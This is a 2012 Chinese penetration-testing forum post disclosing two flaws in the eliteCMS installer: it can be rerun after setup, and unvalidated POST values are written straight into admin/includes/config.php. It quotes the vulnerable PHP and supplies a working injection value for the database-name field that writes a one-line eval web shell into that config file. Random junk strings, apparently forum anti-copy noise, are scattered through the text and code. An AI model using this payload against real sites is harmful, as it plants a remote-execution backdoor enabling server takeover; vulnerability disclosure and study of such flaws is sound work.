中国网络渗透测试联盟

标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞 [打印本页]
作者: admin    时间: 2012-11-18 13:59
标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装6 S! R( F' j( p
& l! C, S9 z* e7 h  @" M+ k
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php7 s8 @6 q8 f, S8 a5 C
我们来看代码:
" O* X: H$ P0 |$ L/ O
8 v% K9 W$ M, |5 |3 N...
7 y+ k: R- c, d  Selseif ($_GET['step'] == "4") {) V/ b* t. q; t/ ^2 \. J& h, W
    $file = "../admin/includes/config.php";+ J' n$ o2 ^' ?2 y. k
    $write = "<?php\n";
* m8 K! o! b( \4 ^& X9 V6 N# C6 o    $write .= "/**\n";# P+ {1 }8 b. J! C0 X" i
    $write .= "*\n";, D4 q% h! p+ @
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";0 l5 I% ~$ M9 c' J; b4 x+ S# K
...略..." O4 F7 L. I. M1 g
    $write .= "*\n";
5 t8 c0 W' [. s: O: n  ]    $write .= "*/\n";
) P5 f1 K/ D0 z1 h; q    $write .= "\n";
0 Z, l* l! Y/ B) W+ t& M; J    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";! n  N0 }/ {7 Q1 S! C) p$ s( t
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
2 z: r6 K: n  ?4 H' y, R2 a+ X/ w    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";' v& x% ~* Z3 A7 J
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";! p! w+ m" U1 R& |/ c
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";8 Q9 T# E0 [) i8 y& H' f9 i3 Y4 k
    $write .= "if (!\$connection) {\n";% ]& Z' A2 s* G& m& q7 u
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
: y" N8 U' L! }2 m% n* H& g" ~    $write .= "        \n";
8 e# q2 }1 J& ?/ r$ m    $write .= "} \n";' T: ^0 e7 Q: R
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";# |; b) y5 o, J! A4 \6 N, O
    $write .= "if (!\$db_select) {\n";* |: u! S+ I/ b+ a2 }( u# M
    $write .= "        die(\"Database select failed\" .mysql_error());\n";) Y; U( d8 p& c' L: S, |
    $write .= "        \n";
, }( ^  `: W; v( x    $write .= "} \n";
: |* A! M( S; h    $write .= "?>\n";
3 y3 \4 g6 Z3 v0 L% Y  E7 y( a
, r( W7 \& ?/ `9 n; J2 }' j  S9 J. e    $writer = fopen($file, 'w');5 i/ y7 @' g" r  G! K
...9 y1 [/ P" T  Z; t1 W

' I% v( j3 c/ ^% _$ U3 m& l9 F在看代码:
* b: v% e9 v) i$ R
4 w7 t- G: A. m0 v; R; H$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];8 i" N' {, C& m
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
% |$ {) V# A7 |) n3 _2 w$_SESSION['DB_USER'] = $_POST['DB_USER'];7 S, f) U6 m% k2 l
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];6 H1 V# H: ~) {7 {6 k+ E+ X
: w- q7 t- f" A
取值未作任何验证, E$ s! ?3 ^# Y
如果将数据库名POST数据:* Q* z% C( B# e# Q% G, G

* e2 P. e) ]# I: x  b( H7 p* C. D"?><?php eval($_POST[c]);?><?php$ l. |* g4 F$ q) [: n3 O) Z) l

6 C) ^: m' S; X+ b( S& f5 t7 t将导致一句话后门写入/admin/includes/config.php# U! t, f1 o4 \# ?  z




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2